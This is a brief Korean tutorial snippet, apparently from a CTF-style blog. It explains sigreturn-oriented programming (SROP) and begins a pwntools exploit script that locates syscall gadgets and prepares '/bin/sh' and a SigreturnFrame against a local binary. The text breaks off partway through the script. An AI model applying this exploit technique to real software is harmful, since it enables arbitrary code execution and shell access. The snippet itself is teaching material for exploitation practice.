SROP ExploitSROP에서 핵심은 "sigreturn system call"이다.해당 system call이 호출될 때, rsp가 가르키는 메모리 영역에 sigcontext 구조체가 위치해야한다.pwntool에서는 SigreturnFrame()를 제공해주고, 거기에 값을 적절히 초기화해서 사용하면 된다. from pwn import *context.arch = 'amd64'p = process('./srop')elf = ELF('./srop')gadget = next(elf.search(asm('pop rax; syscall')))syscall = next(elf.search(asm('syscall')))binsh = '/bin/sh\x00'bss = elf.bss()frame = Sigretur..